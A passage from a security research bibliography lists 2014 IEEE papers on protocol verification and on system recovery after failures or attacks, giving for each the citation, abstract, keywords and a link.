    Keywords: fault tolerance; formal verification; protocols; SNSP; failure modes; fault classes; fault model; fault-tolerant prototype system; fault-tolerant system; formal verification; machine; protocol state machine; recovery mechanisms; safe node sequence protocol; Fault tolerant systems; Model checking; Protocols; Real-time systems; Redundancy; Tunneling magnetoresistance; Safe Node Sequence Protocol; event-triggered protocol; fault-tolerance; model checking (ID#:14-2221)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838748&isnumber=6838626
  • Meng Zhang; Bingham, J.D.; Erickson, J.; Sorin, D.J., "PVCoherence: Designing Flat Coherence Protocols For Scalable Verification," High Performance Computer Architecture (HPCA), 2014 IEEE 20th International Symposium on , vol., no., pp.392,403, 15-19 Feb. 2014. doi: 10.1109/HPCA.2014.6835949 The goal of this work is to design cache coherence protocols with many cores that can be verified with state-of-the-art automated verification methodologies. In particular, we focus on flat (non-hierarchical) coherence protocols, and we use a mostly-automated methodology based on parametric verification (PV). We propose several design guidelines that architects should follow if they want to design protocols that can be parametrically verified. We experimentally evaluate performance, storage overhead, and scalability of a protocol verified with PV compared to a highly optimized protocol that cannot be verified with PV.
    Keywords: cache storage; formal verification; memory protocols; PV Coherence; automated verification methodology; cache coherence protocol; flat coherence protocol; parametric verification; scalable verification; storage overhead; Coherence; Concrete; Guidelines; Manuals; Model checking; Parametric statistics; Protocols (ID#:14-2222)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6835949&isnumber=6835920
  • Kasraoui, M.; Cabani, A; Chafouk, H., "Formal Verification of Wireless Sensor Key Exchange Protocol Using AVISPA," Computer, Consumer and Control (IS3C), 2014 International Symposium on , vol., no., pp.387,390, 10-12 June 2014. doi: 10.1109/IS3C.2014.107 For efficient deployment of sensor nodes required in many logistic applications, it's necessary to build security mechanisms for a secure wireless communication. End-to-end security plays a crucial role for the communication in these networks. This provides the confidentiality, the authentication and mostly the prevention from many attacks at high level. In this paper, we propose a lightweight key exchange protocol WSKE (Wireless Sensor Key Exchange) for IP-based wireless sensor networks. This protocol proposes techniques that allows to adapt IKEv2 (Internet Key Exchange version 2) mechanisms of IPSEC/6LoWPAN networks. In order to check these security properties, we have used a formal verification tools called AVISPA.
    Keywords: IP networks; Internet; cryptographic protocols; formal verification; wireless sensor networks;AVISPA;IKEv2;IP-based wireless sensor networks;IPSEC-6LoWPAN networks; Internet key exchange version 2 mechanism; end-to-end security; formal verification; lightweight key exchange protocol WSKE; wireless sensor key exchange protocol; Authentication; Communication system security; Internet; Protocols; Wireless communication; Wireless sensor networks; IKEv2; IPSec; Security; WSNs (ID#:14-2223)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845899&isnumber=6845429
  • Sumec, S., "Software Tool For Verification Of Sampled Values Transmitted Via IEC 61850-9-2 Protocol," Electric Power Engineering (EPE), Proccedings of the 2014 15th International Scientific Conference on , vol., no., pp.113,117, 12-14 May 2014. doi: 10.1109/EPE.2014.6839413 Nowadays is increasingly used process bus for communication of equipments in substations. In addition to signaling various statuses of device using GOOSE messages it is possible to transmit measured values, which can be used for diagnostic of system or other advanced functions. Transmission of such values via Ethernet is well defined in protocol IEC 61850-9-2. Paper introduces a tool designed for verification of sampled values generated by various devices using this protocol.
    Keywords: IEC standards; local area networks; power engineering computing; protocols; substation protection; system buses; Ethernet; GOOSE messages; IEC 61850-9-2 protocol; process bus; software protection system; software tool; substations; Current measurement; Data visualization; Decoding; IEC standards; Merging; Protocols; Ethernet; sampled values; substation (ID#:14-2224)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839413&isnumber=6839392
  • Kammuller, F., "Verification of DNSsec Delegation Signatures," Telecommunications (ICT), 2014 21st International Conference on , vol., no., pp.298,392, 4-7 May 2014. doi: 10.1109/ICT.2014.6845127 In this paper, we present a formal model for the verification of the DNSsec Protocol in the interactive theorem prover Isabelle/HOL. Relying on the inductive approach to security protocol verification, this formal analysis provides a more expressive representation than the widely accepted model checking analysis. Our mechanized model allows to represent the protocol, all its possible traces and the attacker and his knowledge. The fine grained model allows to show origin authentication, and replay attack prevention. Most prominently, we succeed in expressing Delegation Signatures and proving their authenticity formally.
    Keywords: Internet; cryptographic protocols; formal verification; inference mechanisms; theorem proving; DNSsec delegation signatures; DNSsec protocol; Isabelle-HOL; inductive approach; interactive theorem prover; model checking analysis; security protocol verification; Authentication; IP networks; Protocols; Public key; Servers; DNSsec; Isabelle/HOL; authentication; chain of trust; delegation signatures (ID#:14-2225)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845127&isnumber=6845063
  • Voskuilen, Gwendolyn; Vijaykumar, T.N., "Fractal++: Closing the Performance Gap Between Fractal And Conventional Coherence," Computer Architecture (ISCA), 2014 ACM/IEEE 41st International Symposium on , vol., no., pp.409,420, 14-18 June 2014. doi: 10.1109/ISCA.2014.6853211 Cache coherence protocol bugs can cause multicores to fail. Existing coherence verification approaches incur state explosion at small scales or require considerable human effort. As protocols' complexity and multicores' core counts increase, verification continues to be a challenge. Recently, researchers proposed fractal coherence which achieves scalable verification by enforcing observational equivalence between sub-systems in the coherence protocol. A larger sub-system is verified implicitly if a smaller sub-system has been verified. Unfortunately, fractal protocols suffer from two fundamental limitations: (1) indirect-communication: sub-systems cannot directly communicate and (2) partially-serial-invalidations: cores must be invalidated in a specific, serial order. These limitations disallow common performance optimizations used by conventional directory protocols: reply-forwarding where caches communicate directly and parallel invalidations. Therefore, fractal protocols lack performance scalability while directory protocols lack verification scalability. To enable both performance and verification scalability, we propose Fractal++ which employs a new class of protocol optimizations for verification-constrained architectures: decoupled-replies, contention-hints, and fully-parallel-fractal-invalidations. The first two optimizations allow reply-forwarding-like performance while the third optimization enables parallel invalidations in fractal protocols. Unlike conventional protocols, Fractal++ preserves observational equivalence and hence is scalably verifiable. In 32-core simulations of single- and four-socket systems, Fractal++ performs nearly as well as a directory protocol while providing scalable verifiability whereas the best-performing previous fractal protocol performs 8% on average and up to 26% worse with a single-socket and 12% on average and up to 34% worse with a longer-latency multi-socket system.
    Keywords: Coherence; Erbium; Fractals; Multicore processing; Optimization; Protocols; Scalability (ID#:14-2226)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6853211&isnumber=6853187
  • Wang, H., "Identity-Based Distributed Provable Data Possession in Multi-Cloud Storage," Services Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, March 2014. doi: 10.1109/TSC.2014.1 Remote data integrity checking is of crucial importance in cloud storage. It can make the clients verify whether their outsourced data is kept intact without downloading the whole data. In some application scenarios, the clients have to store their data on multi-cloud servers. At the same time, the integrity checking protocol must be efficient in order to save the verifier's cost. From the two points, we propose a novel remote data integrity checking model: ID-DPDP (identity-based distributed provable data possession) in multi-cloud storage. The formal system model and security model are given. Based on the bilinear pairings, a concrete ID-DPDP protocol is designed. The proposed ID-DPDP protocol is provably secure under the hardness assumption of the standard CDH (computational Diffie- Hellman) problem. In addition to the structural advantage of elimination of certificate management, our ID-DPDP protocol is also efficient and flexible. Based on the client's authorization, the proposed ID-DPDP protocol can realize private verification, delegated verification and public verification.
    Keywords: Cloud computing; Computational modeling; Distributed databases; Indexes; Protocols; Security; Servers (ID#:14-2227)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6762896&isnumber=4629387
  • Alrabaee, S.; Bataineh, A; Khasawneh, F.A; Dssouli, R., "Using Model Checking For Trivial File Transfer Protocol Validation," Communications and Networking (ComNet), 2014 International Conference on , vol., no., pp.1,7, 19-22 March 2014. doi: 10.1109/ComNet.2014.6840934 This paper presents verification and model based checking of the Trivial File Transfer Protocol (TFTP). Model checking is a technique for software verification that can detect concurrency defects within appropriate constraints by performing an exhaustive state space search on a software design or implementation and alert the implementing organization to potential design deficiencies that are otherwise difficult to be discovered. The TFTP is implemented on top of the Internet User Datagram Protocol (UDP) or any other datagram protocol. We aim to create a design model of TFTP protocol, with adding window size, using Promela to simulate it and validate some specified properties using spin. The verification has been done by using the model based checking tool SPIN which accepts design specification written in the verification language PROMELA. The results show that TFTP is free of live locks.
    Keywords: formal verification; transport protocols; Internet user datagram protocol; Promela; SPIN; TFTP protocol; UDP; concurrency defect detection; exhaustive state space search; model based checking tool; software verification; trivial file transfer protocol; Authentication; Protocols; Software engineering; Modeling; Protocol Design; TFTP; Validation (ID#:14-2228)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6840934&isnumber=6840902
  • Alezabi, Kamal Ali; Hashim, Fazirulhisyam; Hashim, Shaiful Jahari; Ali, Borhanuddin M., "An efficient authentication and key agreement protocol for 4G (LTE) networks," Region 10 Symposium, 2014 IEEE , vol., no., pp.502,507, 14-16 April 2014. doi: 10.1109/TENCONSpring.2014.6863085 Long Term Evolution (LTE) networks designed by 3rd Generation Partnership Project (3GPP) represent a widespread technology. LTE is mainly influenced by high data rates, minimum delay and the capacity due to scalable bandwidth and its flexibility. With the rapid and widespread use LTE networks, and increase the use in data/video transmission and Internet applications in general, accordingly, the challenges of securing and speeding up data communication in such networks is also increased. Authentication in LTE networks is very important process because most of the coming attacks occur during this stage. Attackers try to be authenticated and then launch the network resources and prevent the legitimate users from the network services. The basics of Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA) are used in LTE AKA protocol which is called Evolved Packet System AKA (EPS-AKA) protocol to secure LTE network, However it still suffers from various vulnerabilities such as disclosure of the user identity, computational overhead, Man In The Middle (MITM) attack and authentication delay. In this paper, an Efficient EPS-AKA protocol (EEPS-AKA) is proposed to overcome those problems. The proposed protocol is based on the Simple Password Exponential Key Exchange (SPEKE) protocol. Compared to previous proposed methods, our method is faster, since it uses a secret key method which is faster than certificate-based methods, In addition, the size of messages exchanged between User Equipment (UE) and Home Subscriber Server (HSS) is reduced, this reduces authentication delay and storage overhead effectively. The automated validation of internet security protocols and applications (AVISPA) tool is used to provide a formal verification. Results show that the proposed EEPS-AKA is efficient and secure against active and passive attacks.
    Keywords: EEPS-AKA; LTE EPS-AKA; SPEKE (ID#:14-2229)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6863085&isnumber=6862973
  • Zhuo Hao; Yunlong Mao; Sheng Zhong; Li, L.E.; Haifan Yao; Nenghai Yu, "Toward Wireless Security without Computational Assumptions--Oblivious Transfer Based on Wireless Channel Characteristics," Computers, IEEE Transactions on , vol.63, no.6, pp.1580,1593, June 2014. doi: 10.1109/TC.2013.27 Wireless security has been an active research area since the last decade. A lot of studies of wireless security use cryptographic tools, but traditional cryptographic tools are normally based on computational assumptions, which may turn out to be invalid in the future. Consequently, it is very desirable to build cryptographic tools that do not rely on computational assumptions. In this paper, we focus on a crucial cryptographic tool, namely 1-out-of-2 oblivious transfer. This tool plays a central role in cryptography because we can build a cryptographic protocol for any polynomial-time computable function using this tool. We present a novel 1-out-of-2 oblivious transfer protocol based on wireless channel characteristics, which does not rely on any computational assumption. We also illustrate the potential broad applications of this protocol by giving two applications, one on private communications and the other on privacy preserving password verification. We have fully implemented this protocol on wireless devices and conducted experiments in real environments to evaluate the protocol. Our experimental results demonstrate that it has reasonable efficiency.
    Keywords: computational complexity; cryptographic protocols; data privacy; transport protocols; wireless channels;1-out-of-2 oblivious transfer protocol; computational assumptions; cryptographic protocol; cryptographic tools; polynomial-time computable function; privacy preserving password verification; private communications; wireless channel characteristics; wireless devices; wireless security; Channel estimation; Communication system security; Cryptography; Probes; Protocols; Wireless communication; Oblivious transfer; physical channel characteristics; security (ID#:14-2230)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6463377&isnumber=6828816
  • Ceccarelli, A; Montecchi, L.; Brancati, F.; Lollini, P.; Marguglio, A; Bondavalli, A, "Continuous and Transparent User Identity Verification for Secure Internet Services," Dependable and Secure Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, January 2014. doi: 10.1109/TDSC.2013.2297709 Session management in distributed Internet services is traditionally based on username and password, explicit logouts and mechanisms of user session expiration using classic timeouts. Emerging biometric solutions allow substituting username and password with biometric data during session establishment, but in such an approach still a single verification is deemed sufficient, and the identity of a user is considered immutable during the entire session. Additionally, the length of the session timeout may impact on the usability of the service and consequent client satisfaction. This paper explores promising alternatives offered by applying biometrics in the management of sessions. A secure protocol is defined for perpetual authentication through continuous user verification. The protocol determines adaptive timeouts based on the quality, frequency and type of biometric data transparently acquired from the user. The functional behavior of the protocol is illustrated through Matlab simulations, while model-based quantitative analysis is carried out to assess the ability of the protocol to contrast security attacks exercised by different kinds of attackers. Finally, the current prototype for PCs and Android smartphones is discussed.
    Keywords: Authentication; Bioinformatics; Protocols; Servers; Smart phones; Web services; Security; authentication; mobile environments; web servers (ID#:14-2231)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6702439&isnumber=4358699
  • Lei, X.; Liao, X.; Huang, T.; Li, H., "Cloud Computing Service: the Case of Large Matrix Determinant Computation," Services Computing, IEEE Transactions on , vol.PP, no.99, pp.1,1, June 2014. doi: 10.1109/TSC.2014.2331694 Cloud computing paradigm provides an alternative and economical service for resource-constrained clients to perform large-scale data computation. Since large matrix determinant computation (DC) is ubiquitous in the fields of science and engineering, a first step is taken in this paper to design a protocol that enables clients to securely, verifiably, and efficiently outsource DC to a malicious cloud. The main idea to protect the privacy is employing some transformations on the original matrix to get an encrypted matrix which is sent to the cloud; and then transforming the result returned from the cloud to get the correct determinant of the original matrix. Afterwards, a randomized Monte Carlo verification algorithm with one-sided error is introduced, whose superiority in designing inexpensive result verification algorithm for secure outsourcing is well demonstrated. In addition, it is analytically shown that the proposed protocol simultaneously fulfills the goals of correctness, security, robust cheating resistance, and high-efficiency. Extensive theoretical analysis and experimental evaluation also show its high-efficiency and immediate practicability. It is hoped that the proposed protocol can shed light in designing other novel secure outsourcing protocols, and inspire powerful companies and working groups to finish the programming of the demanded all-inclusive scientific computations outsourcing software system. It is believed that such software system can be profitable by means of providing large-scale scientific computation services for so many potential clients. (ID#:14-2232)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6839008&isnumber=4629387
  • Castro Marquez, C.I; Strum, M.; Wang Jiang Chau, "A Unified Sequential Equivalence Checking Approach To Verify High-Level Functionality And Protocol Specification Implementations In RTL Designs," Test Workshop - LATW, 2014 15th Latin American , vol., no., pp.1,6, 12-15 March 2014. doi: 10.1109/LATW.2014.6841905 Formal techniques provide exhaustive design verification, but computational margins have an important negative impact on its efficiency. Sequential equivalence checking is an effective approach, but traditionally it has been only applied between circuit descriptions with one-to-one correspondence for states. Applying it between RTL descriptions and high-level reference models requires removing signals, variables and states exclusive of the RTL description so as to comply with the state correspondence restriction. In this paper, we extend a previous formal methodology for RTL verification with high-level models, to check also the signals and protocol implemented in the RTL design. This protocol implementation is compared formally to a description captured from the specification. Thus, we can prove thoroughly the sequential behavior of a design under verification.
    Keywords: electronic design automation; formal specification; formal verification; high level synthesis; protocols; RTL design verification; computational margin; design under verification; design verification; formal technique; high level functionality verification; high level model; high level reference model; protocol specification implementation; unified sequential equivalence checking approach; Abstracts; Calculators; Computational modeling; Data models; Educational institutions; Integrated circuit modeling; Protocols; RTL design; Sequential equivalence checking; communication protocol; formal verification; high-level models; sequence of states (ID#:14-2233)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841905&isnumber=6841893
  • Wang, Junwei; Wang, Haifeng, "Trust-based QoS routing algorithm for Wireless Sensor Networks," Control and Decision Conference (2014 CCDC), The 26th Chinese , vol., no., pp.2492,2495, May 31 2014-June 2 2014. doi: 10.1109/CCDC.2014.6852592 With the rapid development of Wireless Sensor Networks (WSNs), besides the energy efficient, Quality of Service (QoS) supported and the validity of packet transmission should be considered under some circumstances. In this paper, according to summing up LEACH protocol's advantages and defects, combining with trust evaluation mechanism, energy and QoS control, a trust-based QoS routing algorithm is put forward. Firstly, energy control and coverage scale are adopted to keep load balance in the phase of cluster head selection. Secondly, trust evaluation mechanism is designed to increase the credibility of the network in the stage of node clusting. Finally, in the period of information transmission, verification and ACK mechanism also put to guarantee validity of data transmission. In this paper, it proposes the improved protocol. The improved protocol can not only prolong nodes' life expectancy, but also increase the credibility of information transmission and reduce the packet loss. Compared to typical routing algorithms in sensor networks, this new algorithm has better performance.
    Keywords: Algorithm design and analysis; Data communication; Delays; Energy efficiency; Quality of service; Routing; Wireless sensor networks; Energy Efficient; LEACH; QoS; Trust Routing; Wireless Sensor Networks (ID#:14-2234)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6852592&isnumber=6852105
  • Madhusudhan, R.; Kumar, S.R., "Cryptanalysis of a Remote User Authentication Protocol Using Smart Cards," Service Oriented System Engineering (SOSE), 2014 IEEE 8th International Symposium on, vol., no., pp.474,477, 7-11 April 2014. doi: 10.1109/SOSE.2014.84 Remote user authentication using smart cards is a method of verifying the legitimacy of remote users accessing the server through insecure channel, by using smart cards to increase the efficiency of the system. During last couple of years many protocols to authenticate remote users using smart cards have been proposed. But unfortunately, most of them are proved to be unsecure against various attacks. Recently this year, Yung-Cheng Lee improved Shin et al.'s protocol and claimed that their protocol is more secure. In this article, we have shown that Yung-Cheng-Lee's protocol too has defects. It does not provide user anonymity; it is vulnerable to Denial-of-Service attack, Session key reveal, user impersonation attack, Server impersonation attack and insider attacks. Further it is not efficient in password change phase since it requires communication with server and uses verification table.
    Keywords: computer network security; cryptographic protocols; message authentication; smart cards; Yung-Cheng-Lee's protocol; cryptanalysis; denial-of-service attack; insecure channel; insider attacks; legitimacy verification; password change phase; remote user authentication protocol; server impersonation attack; session key; smart cards; user impersonation attack; verification table; Authentication; Bismuth; Cryptography; Protocols; Servers; Smart cards; authentication; smart card; cryptanalysis; dynamic id}, (ID#:14-2235)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830951&isnumber=6825948
  • Daesung Choi; Sungdae Hong; Hyoung-Kee Choi, "A Group-Based Security Protocol For Machine Type Communications In LTE-Advanced," Computer Communications Workshops (INFOCOM WKSHPS), 2014 IEEE Conference on , vol., no., pp.161,162, April 27 2014-May 2 2014. doi: 10.1109/INFCOMW.2014.6849205 We propose Authentication and Key Agreement (AKA) for Machine Type Communications (MTC) in LTE-Advanced. This protocol is based on an idea of grouping devices so that it would reduce signaling congestion in the access network and overload on the single authentication server. We verified that this protocol is designed to be secure against many attacks by using a software verification tool. Furthermore, performance evaluation suggests that this protocol is efficient with respect to authentication overhead and handover delay.
    Keywords: Long Term Evolution; cryptographic protocols; mobility management (mobile radio);radio access networks; signaling protocols; telecommunication security; AKA;LTE-advanced communication; MTC; access network; authentication and key agreement; group-based security protocol; handover delay; machine type communication; performance evaluation; signaling congestion reduction; single authentication server overhead; software verification tool; Authentication; Computer science; Delays; Handover; Protocols (ID#:14-2236)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6849205&isnumber=6849127
  • Liu, W.; Yu, M., "AASR: An Authenticated Anonymous Secure Routing Protocol for MANETs in Adversarial Environment," Vehicular Technology, IEEE Transactions on , vol.PP, no.99, pp.1,1, March 2014. doi: 10.1109/TVT.2014.2313180 Anonymous communications are important for many applications of the mobile ad hoc networks (MANETs) deployed in adversary environments. A major requirement on the network is to provide unidentifiability and unlinkability for mobile nodes and their traffics. Although a number of anonymous secure routing protocols have been proposed, the requirement is not fully satisfied. The existing protocols are vulnerable to the attacks of fake routing packets or denial-of-service (DoS) broadcasting, even the node identities are protected by pseudonyms. In this paper, we propose a new routing protocol, i.e., authenticated anonymous secure routing (AASR), to satisfy the requirement and defend the attacks. More specifically, the route request packets are authenticated by a group signature, to defend the potential active attacks without unveiling the node identities. The key-encrypted onion routing with a route secret verification message, is designed to prevent intermediate nodes from inferring a real destination. Simulation results have demonstrated the effectiveness of the proposed AASR protocol with improved performance as compared to the existing protocols.
    Keywords: (not provided) (ID#:14-2237)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6777291&isnumber=4356907
  • Huaqun Wang; Qianhong Wu; Bo Qin; Domingo-Ferrer, J., "Identity-based Remote Data Possession Checking In Public Clouds," Information Security, IET , vol.8, no.2, pp.114,121, March 2014. doi: 10.1049/iet-ifs.2012.0271 Checking remote data possession is of crucial importance in public cloud storage. It enables the users to check whether their outsourced data have been kept intact without downloading the original data. The existing remote data possession checking (RDPC) protocols have been designed in the PKI (public key infrastructure) setting. The cloud server has to validate the users' certificates before storing the data uploaded by the users in order to prevent spam. This incurs considerable costs since numerous users may frequently upload data to the cloud server. This study addresses this problem with a new model of identity-based RDPC (ID-RDPC) protocols. The authors present the first ID-RDPC protocol proven to be secure assuming the hardness of the standard computational Diffie-Hellman problem. In addition to the structural advantage of elimination of certificate management and verification, the authors ID-RDPC protocol also outperforms the existing RDPC protocols in the PKI setting in terms of computation and communication.
    Keywords: cloud computing; cryptographic protocols; public key cryptography; storage management; unsolicited e-mail; ID-RDPC protocol; PKI setting; certificate management elimination; cloud server; data outsourcing; identity-based RDPC protocols; identity-based remote data possession checking protocol; public cloud storage; public key infrastructure; spam; standard computational Diffie-Hellman problem (ID#:14-2238)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748545&isnumber=6748540

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


System Recovery

System Recovery



System recovery following an attack is a core cybersecurity issue. Current research into methods to undo data manipulation and to recover lost or extruded data in distributed, cloud-based or other large scale complex systems is discovering new approaches and methods. The articles cited here are from the first half of 2014.

  • Silei Xu; Runhui Li; Lee, P.P.C.; Yunfeng Zhu; Liping Xiang; Yinlong Xu; Lui, J.C.S., "Single Disk Failure Recovery for X-Code-Based Parallel Storage Systems," Computers, IEEE Transactions on , vol.63, no.4, pp.995,1007, April 2014. In modern parallel storage systems (e.g., cloud storage and data centers), it is important to provide data availability guarantees against disk (or storage node) failures via redundancy coding schemes. One coding scheme is X-code, which is double-fault tolerant while achieving the optimal update complexity. When a disk/node fails, recovery must be carried out to reduce the possibility of data unavailability. We propose an X-code-based optimal recovery scheme called minimum-disk-read-recovery (MDRR), which minimizes the number of disk reads for single-disk failure recovery. We make several contributions. First, we show that MDRR provides optimal single-disk failure recovery and reduces about 25 percent of disk reads compared to the conventional recovery approach. Second, we prove that any optimal recovery scheme for X-code cannot balance disk reads among different disks within a single stripe in general cases. Third, we propose an efficient logical encoding scheme that issues balanced disk read in a group of stripes for any recovery algorithm (including the MDRR scheme). Finally, we implement our proposed recovery schemes and conduct extensive testbed experiments in a networked storage system prototype. Experiments indicate that MDRR reduces around 20 percent of recovery time of the conventional approach, showing that our theoretical findings are applicable in practice.
    Keywords: disc storage; encoding; parallel memories; redundancy; reliability; storage management; system recovery; MDRR; X-code-based optimal recovery scheme; X-code-based parallel storage systems; cloud storage; data availability; data centers; double-fault tolerant coding scheme; logical encoding scheme; minimum-disk-read-recovery; networked storage system prototype; optimal single-disk failure recovery; optimal update complexity; redundancy coding schemes; single disk failure recovery algorithm; Arrays; Complexity theory; Data communication; Encoding; Load management; Peer to peer computing; Reliability; Parallel storage systems; coding theory; data availability; recovery algorithm (ID#:14-2239)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6409832&isnumber=6774900
  • Malik, O.A; Senanayake, S.M.N.; Zaheer, D., "An Intelligent Recovery Progress Evaluation System for ACL Reconstructed Subjects Using Integrated 3-D Kinematics and EMG Features," Biomedical and Health Informatics, IEEE Journal of , vol.PP, no.99, pp.1,1,April 2014. An intelligent recovery evaluation system is presented for objective assessment and performance monitoring of anterior cruciate ligament reconstructed (ACL-R) subjects. The system acquires 3-D kinematics of tibiofemoral joint and electromyography (EMG) data from surrounding muscles during various ambulatory and balance testing activities through wireless body-mounted inertial and EMG sensors, respectively. An integrated feature set is generated based on different features extracted from data collected for each activity. The fuzzy clustering and adaptive neuro-fuzzy inference techniques are applied to these integrated feature sets in order to provide different recovery progress assessment indicators (e.g. current stage of recovery, percentage of recovery progress as compared to healthy group etc.) for ACL-R subjects. The system was trained and tested on data collected from a group of healthy and ACL-R subjects. For recovery stage identification, the average testing accuracy of the system was found above 95% (95-99%) for ambulatory activities and above 80% (80-84%) for balance testing activities. The overall recovery evaluation performed by the proposed system was found consistent with the assessment made by the physiotherapists using standard subjective/objective scores. The validated system can potentially be used as a decision supporting tool by physiatrists, physiotherapists and clinicians for quantitative rehabilitation analysis of ACL-R subjects in conjunction with the existing recovery monitoring systems.
    Keywords: (not provided) (ID#:14-2240)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6805568&isnumber=6363502
  • Kaczmarek, J.; Wrobel, M.R., "Operating system security by integrity checking and recovery using write-protected storage," Information Security, IET , vol.8, no.2, pp.122,131, March 2014. An integrity checking and recovery (ICAR) system is presented here, which protects file system integrity and automatically restores modified files. The system enables files cryptographic hashes generation and verification, as well as configuration of security constraints. All of the crucial data, including ICAR system binaries, file backups and hashes database are stored in a physically write-protected storage to eliminate the threat of unauthorized modification. A buffering mechanism was designed and implemented in the system to increase operation performance. Additionally, the system supplies user tools for cryptographic hash generation and security database management. The system is implemented as a kernel extension, compliant with the Linux security model. Experimental evaluation of the system was performed and showed an approximate 10% performance degradation in secured file access compared to regular access.
    Keywords: Linux; database management systems; security of data ;ICAR system binaries ;Linux security model; buffering mechanism; cryptographic hashes generation; file backups; file system integrity; hashes database; integrity checking and recovery system; security constraints; security database management; system security; unauthorized modification; write-protected storage (ID#:14-2241)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748546&isnumber=6748540
  • Yunfeng Zhu; Lee, P.P.C.; Yinlong Xu; Yuchong Hu; Liping Xiang, "On the Speedup of Recovery in Large-Scale Erasure-Coded Storage Systems," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.7, pp.1830,1840, July 2014. Modern storage systems stripe redundant data across multiple nodes to provide availability guarantees against node failures. One form of data redundancy is based on XOR-based erasure codes, which use only XOR operations for encoding and decoding. In addition to tolerating failures, a storage system must also provide fast failure recovery to reduce the window of vulnerability. This work addresses the problem of speeding up the recovery of a single-node failure for general XOR-based erasure codes. We propose a replace recovery algorithm, which uses a hill-climbing technique to search for a fast recovery solution, such that the solution search can be completed within a short time period. We further extend the algorithm to adapt to the scenario where nodes have heterogeneous capabilities (e.g., processing power and transmission bandwidth). We implement our replace recovery algorithm atop a parallelized architecture to demonstrate its feasibility. We conduct experiments on a networked storage system testbed, and show that our replace recovery algorithm uses less recovery time than the conventional recovery approach.
    Keywords: fault tolerant computing; storage management; XOR operations; XOR-based erasure codes; availability guarantees; data redundancy; fast recovery solution; hill-climbing technique; large-scale erasure-coded storage systems; networked storage system testbed; node failures; parallelized architecture; replace recovery algorithm; single-node failure recovery; vulnerability window; Algorithm design and analysis;Distributed databases;Encoding;Equations;Generators;Mathematical model;Strips;XOR-coded storage system;recovery algorithm;single-node failure} (ID#:14-2242)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6613479&isnumber=6828815
  • Yuankai Chen; Xuan Zeng; Hai Zhou, "Recovery-based resilient latency-insensitive systems," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,6, 24-28 March 2014. As the interconnect delay is becoming a larger fraction of the clock cycle time, the conventional global stalling mechanism, which is used to correct error in general synchronous circuits, would be no longer feasible because of the expensive timing cost for the stalling signal to travel across the circuit. In this paper, we propose recovery-based resilient latency-insensitive systems (RLISs) that efficiently integrate error-recovery techniques with latency-insensitive design to replace the global stalling. We first demonstrate a baseline RLIS as the motivation of our work that uses additional output buffer which guarantees that only correct data can enter the output channel. However this baseline RLIS suffers from performance degradations even when errors do not occur. We propose a novel improved RLIS that allows erroneous data to propagate in the system. Equipped with improved queues that prevent accumulation of erroneous data, the improved RLIS retains the system performance. We provide theoretical study that analyzes the impact of errors on system performance and the queue sizing problem. We also theoretically prove that the improved RLIS performs no worse than the global stalling mechanism. Experimental results show that the improved RLIS has 40.3% and even 3.1% throughput improvements compared to the baseline RLIS and the infeasible global stalling mechanism respectively, with less than 10% hardware overhead.
    Keywords: clocks; integrated circuit interconnections; logic circuits; RLIS; clock cycle time; error impact; error-recovery; expensive timing cost; global stalling mechanism; improved queues; interconnect delay; queue sizing problem; recovery-based resilient latency-insensitive systems; stalling signal; synchronous circuits; Clocks; Degradation ;Integrated circuit interconnections; Relays; Synchronization; System performance; Throughput (ID#:14-2243)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800317&isnumber=6800201
  • Hong, Bi; Choi, Wan, "Asymptotic Analysis Of Failed Recovery Probability In A Distributed Wireless Storage System With Limited Sum Storage Capacity," Acoustics, Speech and Signal Processing (ICASSP), 2014 IEEE International Conference on , vol., no., pp.6459,6463, 4-9 May 2014. In distributed wireless storage systems, failed recovery probability depends on not only wireless channel conditions but also storage size of each distributed storage node. For efficient utilization of limited storage capacity, we asymptotically analyze the failed recovery probability of a distributed wireless storage system with a sum storage capacity constraint when signal-to-noise ratio goes to infinity, and find the optimal storage allocation strategy across distributed storage nodes in terms of the asymptotic failed recovery probability. It is also shown that when the number of storage nodes is sufficiently large the storage size required at each node is not so large for high exponential order of the failed recovery probability.
    Keywords: Distributed storage system; failed recovery; maximum distance separable coding; wireless storage (ID#:14-2244)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6854848&isnumber=6853544
